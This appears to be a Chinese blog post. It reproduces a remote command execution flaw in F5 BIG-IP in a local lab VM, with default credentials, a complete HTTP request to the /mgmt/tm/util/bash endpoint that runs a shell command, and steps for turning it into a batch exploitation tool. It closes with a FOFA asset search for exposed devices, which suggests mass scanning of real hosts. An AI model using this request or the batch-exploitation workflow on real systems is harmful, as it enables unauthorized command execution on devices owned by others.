伊始
前几天看了眼F5-RCE的poc,复制粘贴了一下。
荣获脚本小子称号。。。
漏洞复现
注册账号:
https://login.f5.com/resource/registerEmail.do
邮箱激活之后,来下载。
因为下载的是ova格式的,我的电脑是mac,所以用了VMware Fusion Pro来运行它
导入完成后,输入
用户名:root
密码:default
成功登陆后,输入config
确定服务ip
直接登陆后可以命令执行。
不过跟公开的poc不太一样,因为他的认证方式是cookie,同时我们需要知道后台账号密码才可以rce。
X-F5-Auth-Token:
Authorization: Basic YWRtaW46QVNhc1M=
又去看了之前发布的公告,漏洞影响的版本范围。
于是我去下载了16.0.0
poc直接打本地,成功
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.0.105
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
X-F5-Auth-Token:
Authorization: Basic YWRtaW46QVNhc1M=
Content-Length: 47
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://192.168.0.103/tmui/login.jsp
Upgrade-Insecure-Requests: 1
{
"command":"run",
"utilCmdArgs":"-c id"
}
批量利用工具编写
这个时候我们必须Diy下漏洞批量工具。
前往https://github.com/tangxiaofeng7/TSLab-Exploit
下载我之前写过的脚手架。
idea打开它
打开Tools类
增加一个if语句
接着到exploit包下新建一个类-f5_rce 名字要跟刚刚new的函数对应
一顿操作完之后。。。
fofa搜素资产
使用fofa搜索
icon_hash="xxxxxx"《清水师傅提供的》